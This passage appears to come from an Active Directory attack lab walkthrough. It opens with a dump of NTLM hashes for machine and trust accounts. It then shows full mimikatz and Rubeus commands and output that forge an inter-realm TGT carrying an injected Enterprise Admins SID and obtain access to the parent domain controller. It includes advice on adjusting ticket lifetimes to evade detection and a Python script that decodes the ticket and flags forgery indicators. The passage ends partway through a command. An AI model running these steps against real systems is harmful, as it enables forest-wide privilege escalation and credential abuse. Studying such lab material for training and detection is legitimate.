
RID : 00003573 (13683)


User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)


User : DCORP-STD164$
LM :
NTLM : 9fa111e9828fcb2a53d01dcf8133cc0d

RID : 00003575 (13685)


User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)


User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)


User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)


User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)


User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)


User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)


User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)


User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88

RID : 0000357d (13693)


User : DCORP-STD173$
LM :
NTLM : 323a672db50f9467fde4368c6a60c8d8

RID : 0000357e (13694)


User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)


User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)


User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)


User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)


User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)


User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)


User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688

RID : 0000044f (1103)


User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)


User : US$
LM :
NTLM : 3bc75c500d5b5ff9d6d246c80da6a2fc

RID : 00000458 (1112)


User : ecorp$
LM :
NTLM : 48535da9746fc33e5e04cca00c31a7e2

Forging inter-realm TGT
With the mcorp$ trust key we can forge the referral ticket that dcorp's KDC would normally issue for moneycorp.local. kerberos::golden is given the child domain's SID, the trust key as /rc4, /service:krbtgt with /target:moneycorp.local, and under /sids the Enterprise Admins group of the parent, i.e. the parent domain SID S-1-5-21-335606122-960912869-3279953914 with RID 519. This works because SID history carried in the PAC is not filtered by default between domains of the same forest, so the parent KDC accepts the injected SID as if it were one of the child's own.

Using BetterSafetyKatz.exe
C:\Windows\system32>C:\AD\Tools\Old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/rc4:a8f73b279dc7257c7a8a2d0c911043d2 /service:krbtgt /target:moneycorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket.kirbi" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:administrator /domain:dollarcorp.moneycorp.local


/sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/rc4:a8f73b279dc7257c7a8a2d0c911043d2 /service:krbtgt /target:moneycorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket.kirbi
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: a8f73b279dc7257c7a8a2d0c911043d2 - rc4_hmac_nt
Service : krbtgt
Target : moneycorp.local
Lifetime : 7/4/2024 10:17:52 AM ; 7/2/2034 10:17:52 AM ; 7/2/2034 10:17:52 AM
-> Ticket : C:\Users\student163\Desktop\shared\trustticket.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !


mimikatz(commandline) # exit
Bye!

The Lifetime line above shows mimikatz' default validity of ten years; tickets that long are an obvious indicator, and /startoffset, /endin and /renewmax let the forged ticket match the domain's normal 10-hour ticket age and 7-day renewal window. Now, presenting this inter-realm TGT to the root domain's KDC, we can ask for a service ticket for any service on the root domain controller: the parent KDC decrypts the referral with the shared trust key, finds the Enterprise Admins SID in the PAC's SID history and, because SID filtering is not applied inside a forest, carries it into the service ticket.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:"C:\Users\student163\Desktop\shared\trustticket.kirbi" /service:cifs/mcorp-
dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

doIF3DCCBdigAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
MCmgAwIBAqEiMCAbBGNpZnMbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCBGowggRmoAMCARKhAwIB
DqKCBFgEggRUGNW2wawTbYFV+max/JlmS+DPllv/hdwsdS2akYivHVve6g1kLCMbwwXy3WynBstrQN1c
QX2boACL9Q0Zcp6voO5HsrEBdqqvhA01rgq8GKs6D8cxdZVKD2w/noDYU/Qy9zr7L+aVZECRX8PWUaI9
JSM8pJsGFJHxZOITHRBx/A1dwoP6XJF/5AavwPUSAp7LmVBPmOvBgN4CiXvgcotqiQhNBCcazZ9q4HCH
QvAKX2Ka3k0bHM8zmNuw3YyU2Wa8NXetSRzJeewYCON4xG41jc4Dn61/Vs0j7bKT58q1xIYhzgGj0Py5
Y4DapTWJAsb4m7xT2qE2i84LHXwpaWr+vFVt5psjR0ZUHon2XYvBOizL7Ibn3DFco54WIpmlPY4+K8sR
K7vXv1ftzhYDivUk2ssgNoonBdFCmfWi+sBZ5oI9nkVgAs1gDV1XadBx0aBWmC1QXEN1NTH48nnkqb1R
6PZmCgWMWhGxaSDUk0blqyPU9jv9DcE+Z+6slegYfLlqhXLvxN/42nudHy859sZxr4up+o0N/6iVzN2n
NdG/ALJ3gjlvuhkl03y5A7glEfYMQmg4YFuzpdUiLd1UPILn0cjxOfUJI8StCNG+0tHTwDci7G+I3b6Z
vVvXJsWKdcfO+5J7KWmYwBdBqgveI55HP3H/Td7lgjOCqMx/LA1LZ1YXDKmN/QmAEKLF+8N0hYCpCA0b
9VicAHAjp8/3176WAddYn6mGaLajG7/vtMoFT2qjgWfGufmnCQpGbmTb1Frw0HSuURPPCF3cnlYF5cP5
Wqmf8aDy9fe8fX2GETpBFnbVwFhx6XypGSNvl5XHMXtlpzIqNOOq8mOpAg6O5OivR4k76/VUFr2Y60GO
NcJBHPpj+xX8Uyx3LWmqPPRxT6XYqu1TyApoaMYYLGUPsAzGO35rk01gdb2QGxOqAAxHjprt1QppQjlY
i/PGAJ2J0V/CJkTcOv+lTuj7XwL1ZpMDMA56Ltyb4rznmMCueM0boE80n8KOkRVFJf7nQVZAJdV5xw4X
RJ8X1ONy5wW9vzKYPWnJimNCXBWeNEDxKYTqcwQQsAk12vHf3/ha7L1lezd1dncOfOeNAlZHCXWXswM/
GmTglFUg4UCcSUY93Eun+ZwMZtBNGoq7nDkIuVGiy6qhllNDI7M0DU//z217ItGmqzFzbHhSWBl9Uw6/
xsU1pGgXDCdnbIo5XALft2/HMV+e1uF+Z4q8OdSnyoTUI7M0ZVjxJVviazNJJX5xtV+GM7/+++oMDee9
UtWRj/qgcOSlXIppS6fI++VaSrSbsvH/V1v4k3nZ/cK6WIH93asj+LzuyUo6ErEnqCvGMvWisuWi/P4Q
t+eAQtqwSCXtvGwIXK5lAnrBOnRNLIq/61jH592BCcxJJSlzMwq6wLTFfi3JE9rTX9Q8mp9KZ1b8HONK
zZCzqSF+UbAU8LuAKQXn+nx1UJVcxCVIheXJcmUdiI4Nz5OXR6OCAQcwggEDoAMCAQCigfsEgfh9gfUw
gfKgge8wgewwgemgKzApoAMCARKhIgQgJ7r2661WSy09dx0wN/HwdhPIcqbZu9isQahO1U57RsehHBsa
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcDBQBA
pQAApREYDzIwMjQwNzA0MTcxOTM0WqYRGA8yMDI0MDcwNTAzMTkzNFqnERgPMjAyNDA3MTExNzE5MzRa
qBEbD01PTkVZQ09SUC5MT0NBTKkrMCmgAwIBAqEiMCAbBGNpZnMbGG1jb3JwLWRjLm1vbmV5Y29ycC5s
b2NhbA==

ServiceName : cifs/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 7/4/2024 10:19:34 AM
EndTime : 7/4/2024 8:19:34 PM
RenewTill : 7/11/2024 10:19:34 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : J7r2661WSy09dx0wN/HwdhPIcqbZu9isQahO1U57Rsc=

C:\Windows\system32>klist

Current LogonId is 0:0x2125aa

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local


Server: cifs/mcorp-dc.moneycorp.local @ MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate
name_canonicalize
Start Time: 7/4/2024 10:19:34 (local)
End Time: 7/4/2024 20:19:34 (local)
Renew Time: 7/11/2024 10:19:34 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\mcorp-dc.moneycorp.local\c$\
Volume in drive \\mcorp-dc.moneycorp.local\c$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\mcorp-dc.moneycorp.local\c$

05/08/2021 01:20 AM <DIR> PerfLogs


11/10/2022 10:53 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
11/11/2022 07:33 AM <DIR> Users
01/10/2024 02:35 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 11,244,785,664 bytes free

Using Rubeus
Rubeus builds the same referral ticket with its silver action: /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL names the ticket, /rc4 supplies the mcorp$ trust key it is encrypted with (ServiceKeyType KERB_CHECKSUM_HMAC_MD5 below means the PAC is signed with RC4/HMAC-MD5), /sids injects the parent's Enterprise Admins SID, and /ldap pulls the Administrator account's RID, group RIDs and the domain policy from the child DC (including a SYSVOL mount for the policy) so that the PAC matches a genuine one. /nowrap prints the base64 ticket on a single line so it can be pasted into asktgs.
C:\Windows\system32>C:\AD\Tools\Rubeus.exe silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL
/rc4:a8f73b279dc7257c7a8a2d0c911043d2 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-
21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)


[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ExtraSIDs : S-1-5-21-335606122-960912869-3279953914-519
[*] ServiceKey : A8F73B279DC7257C7A8A2D0C911043D2
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : A8F73B279DC7257C7A8A2D0C911043D2
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : DOLLARCORP.MONEYCORP.LOCAL

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime : 7/4/2024 10:33:21 AM


[*] StartTime : 7/4/2024 10:33:21 AM
[*] EndTime : 7/4/2024 8:33:21 PM
[*] RenewTill : 7/11/2024 10:33:21 AM

[*] base64(ticket.kirbi):

doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wL
aADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJQEggSQsT
mYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEvYzbZ5nLF
gXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5poiSNeaDt
G2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgnydchvm0jc
NeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlKADBpWnpV
sleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192qUcofrng
VSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGEVveFyB7q
2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/iAaQE18sC
v1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3fOt1Jju5
r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvKeXQedsvK
BfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7CxriVS9L
TaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJP+k7JRuN
NxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0Ea5AoJj+
J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtMDncaVWf1
pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3l2Nk1ZW+
kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG98t3Dus/0
RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5JOl7yu5r
Fda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVuVO/XioRw
bGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI0
MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyMVqoHBsaR
E9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0
FM
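
The .kirbi Rubeus prints is a KRB-CRED: the Ticket itself (encrypted with the trust key, so its body, PAC and the injected SID cannot be read here) plus an unencrypted EncKrbCredPart carrying the session key, client name, flags and times. The script below is an added example written for these notes, not code from Rubeus or the course: it decodes that structure with a small DER walker, pulls out the fields worth verifying before using such a ticket (or when hunting for one), and flags what makes it stand out next to the genuine AES tickets in the klist output above. It uses the forged TGT printed directly above, re-joined from its wrapped lines; der_read, der_tree, ctx, inspect_kirbi and indicators are names chosen here.

```python
import base64
from datetime import datetime, timedelta, timezone

# The forged TGT that 'Rubeus.exe silver ... /nowrap' printed above, re-joined from the
# wrapped lines on this page (a .kirbi is a base64-encoded KRB-CRED structure).
FORGED_TGT_B64 = "".join("""
doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wL
aADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJQEggSQsT
mYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEvYzbZ5nLF
gXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5poiSNeaDt
G2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgnydchvm0jc
NeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlKADBpWnpV
sleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192qUcofrng
VSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGEVveFyB7q
2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/iAaQE18sC
v1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3fOt1Jju5
r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvKeXQedsvK
BfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7CxriVS9L
TaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJP+k7JRuN
NxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0Ea5AoJj+
J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtMDncaVWf1
pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3l2Nk1ZW+
kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG98t3Dus/0
RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5JOl7yu5r
Fda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVuVO/XioRw
bGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI0
MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyMVqoHBsaR
E9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0
FM
""".split())

def der_read(buf, pos):
    """One DER TLV at pos -> (class, constructed, tag, value, end). Kerberos uses no tag
    number above 30, so the multi-byte tag form is not handled."""
    first, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                   # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return first >> 6, bool(first & 0x20), first & 0x1F, buf[pos:pos + length], pos + length

def der_tree(buf):
    """Decode DER into [(class, tag, payload)]; payload is a list for constructed types
    (SEQUENCE, [n] and [APPLICATION n] tags) and the raw bytes for primitives."""
    nodes, pos = [], 0
    while pos < len(buf):
        cls, cons, tag, val, pos = der_read(buf, pos)
        nodes.append((cls, tag, der_tree(val) if cons else val))
    return nodes

def ctx(seq, n):
    """The element wrapped in explicit context tag [n] among a SEQUENCE's children, or None."""
    return next((p[0] for c, t, p in seq if c == 2 and t == n), None)

def principal(node):
    """PrincipalName -> its name-string [1] parts joined with '/'."""
    return "/".join(s[2].decode() for s in ctx(node[2], 1)[2])

def krb_time(node):
    return datetime.strptime(node[2].decode(), "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)

def inspect_kirbi(b64):
    """Fields of a KRB-CRED worth checking: the Ticket header (realm, sname, etype, kvno;
    the body and PAC stay encrypted) and the clear EncKrbCredPart (key, client, flags, times)."""
    cred = der_tree(base64.b64decode(b64))[0]
    if (cred[0], cred[1]) != (1, 22):                   # [APPLICATION 22] KRB-CRED
        raise ValueError("not a KRB-CRED")
    body = cred[2][0][2]
    tseq = ctx(body, 2)[2][0][2][0][2]                  # tickets[0] -> Ticket SEQUENCE
    enc = ctx(tseq, 3)[2]                               # EncryptedData of the ticket
    cred_part = der_tree(ctx(ctx(body, 3)[2], 2)[2])[0] # enc-part is etype 0 in a .kirbi
    info = ctx(cred_part[2][0][2], 0)[2][0][2]          # ticket-info[0], a KrbCredInfo
    key = ctx(info, 0)[2]
    return {
        "realm": ctx(tseq, 1)[2].decode(),
        "sname": principal(ctx(tseq, 2)),
        "ticket_etype": int.from_bytes(ctx(enc, 0)[2], "big"),
        "kvno": int.from_bytes(ctx(enc, 1)[2], "big") if ctx(enc, 1) else None,
        "session_keytype": int.from_bytes(ctx(key, 0)[2], "big"),
        "session_key": base64.b64encode(ctx(key, 1)[2]).decode(),
        "client": principal(ctx(info, 2)) + "@" + ctx(info, 1)[2].decode(),
        "flags": int.from_bytes(ctx(info, 3)[2][1:], "big"),   # skip BIT STRING pad byte
        "start": krb_time(ctx(info, 5)),
        "end": krb_time(ctx(info, 6)),
        "renew_till": krb_time(ctx(info, 7)),
    }

def indicators(t):
    """Why this ticket stands out in a domain whose genuine tickets use AES (cf. klist above)."""
    hits = []
    if t["sname"].startswith("krbtgt/") and t["ticket_etype"] == 23:
        hits.append("TGT encrypted with RC4 (etype 23): built from an NTLM-style key, not AES")
    if t["session_keytype"] == 23:
        hits.append("RC4 session key")
    if t["end"] - t["start"] > timedelta(hours=10):
        hits.append("lifetime above the default 10h MaxTicketAge (mimikatz' default is 10 years)")
    return hits

if __name__ == "__main__":
    ticket = inspect_kirbi(FORGED_TGT_B64)
    for k, v in ticket.items():
        print(f"{k:16} {v}")
    print(indicators(ticket))
```

Rubeus kept the domain's 10-hour lifetime, so only the two RC4 findings fire for this ticket; the same check run on the mimikatz ticket from the previous step would also report the ten-year lifetime. The PAC with the injected Enterprise Admins SID is inside the encrypted part and can only be inspected with the trust key.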

We then feed the base64 ticket to Rubeus asktgs, with /dc pointing at the root DC, and request service tickets only for the SPNs we actually need; /ptt injects each one into the current logon session. The cifs/ ticket earlier gave SMB access to the C$ share; the host/ and rpcss/ tickets requested next are the pair WMI needs on mcorp-dc.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ
0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJ
QEggSQsTmYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEv
YzbZ5nLFgXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5p
oiSNeaDtG2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgny
dchvm0jcNeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlK
ADBpWnpVsleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192
qUcofrngVSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGE
VveFyB7q2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/i
AaQE18sCv1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3
fOt1Jju5r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvK
